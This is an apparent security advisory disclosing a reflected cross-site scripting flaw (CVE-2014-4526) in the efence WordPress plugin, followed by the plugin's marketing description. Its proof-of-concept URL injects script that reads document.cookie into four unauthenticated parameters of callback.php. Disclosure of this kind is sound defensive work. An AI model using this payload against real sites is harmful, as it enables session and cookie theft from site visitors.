wp-plugin : efence – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : efence

 

Effected Version : 1.3.2 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

*PoC:*
http://localhost/wordpress/wp-content/wp-plugs/efence/callback.php?message=message%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&zoneid=zoneid%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&pubKey=pubKey%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&privKey=privKey%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4526

 
Plugin Description :
 
efence can do the following for you:

1. **Protection against spam and malicious bots that can harm your web resources**: efence is an alternative to CAPTCHA which protects your website against spam and makes it fun for the user to solve challenges. It presents an interactive picture based challenge for the users giving them a break from typing those boring twisted characters. It brings in the fun factor while avoiding the serious spam. Moreover it's an ideal spam protection tool for handheld devices. Just ask your users about what they like doing on their mobile or tablet, typing those twisted characters or just touch, tap and slide. The answer would be exactly what efence offers.

2. **Guaranteed user engagement with your valued digital advertising and marketing materials**: In case of a traditional CAPTCHA, when the user fights with those ugly looking twisted monsters, all that precious time and attention gets wasted with no benefit at all. efence empowers you to capitalize on this precious time and effort. What do you get ? dedicated eyeballs, guaranteed user engagement. This is done by providing great control and flexibility in creating your own branding images for guaranteed engagement. To place your branding images for free, please contact us at support@engageclick.com

    This is an official efence plugin which lets you embed efence at the most critical places on your website without editing any files. It takes only a few minutes to install and configure the plugin, in order to unleash the immense power of efence.

= Significant features =

* Receive guaranteed attention to your in-house or external digital marketing contents
* Spam protection by an innovative "Captcha" alternative
* Places a customizable spam protection mechanism on your site - customize colors, shape, size and other attributes.
* Audio aid for visually impaired
* Category based customizable challenge options.
* Customer engagement using your own branding images.
* Powerful analytics to understand customer behavior.
* Works in all the browsers (including IE6!).
* Secure channel option for information security.
* Non-blocking, high-performance code.


Sign up for efence - [efence.engageclick.com](http://efence.engageclick.com)

Take an online demo to get an idea of how efence works as a powerful Captcha alternative ensuring customer engagement.

= Go Premium =

If you have custom requirements and need support package, we have an dedicated awesome team that delivers quality customization and support[Visit official plugin homepage](http://efence.engageclick.com/selfservice-2/plugin/wordpress).

Leave a Reply

Your email address will not be published. Required fields are marked *